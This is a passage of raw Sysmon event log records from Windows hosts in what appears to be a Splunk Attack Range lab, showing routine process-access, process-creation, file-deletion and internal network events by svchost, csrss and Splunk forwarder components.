11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1765-6216-0C05-000000003902}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1765-6216-0C05-000000003902}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-1765-6216-0C05-000000003902}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:50.721{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F24B1EB43320110F13439B763B92A28,SHA256=09AA2E99E1CFFA21B163445E5212684186E761C7C7A5716175F1F760E2305C77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:50.162{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40211AA0FE594F6557B6CDB98FA9342D,SHA256=DFC6B1E3547002D30CE19E820CC0C8C3EEBA0DE4BBF96A066E36A1D8F93DB9E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:50.221{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A82B4EC97DD942E8F141D2659BEB43B9,SHA256=CDD67EC90B15CFC68EA58783A7CF44FF68F51293C653F064317E976088D4AE04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.768{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0934FF1357324FA0DAB575009BE5304D,SHA256=5F7A89793B646025AEBDECC8FEA18630B5B6C05D186F9A546A1C965F2A5F477E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:51.192{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D64794FDA3425234805C5F5D6D5301F,SHA256=79DD4E5EF93419780D496F44E4459C3F34394DDCD61392D4DF5BA32CC91FA856,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:48.562{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51636-false10.0.1.12-8000- 10341000x8000000000000000221268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1767-6216-0E05-000000003902}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1767-6216-0E05-000000003902}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.252{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program 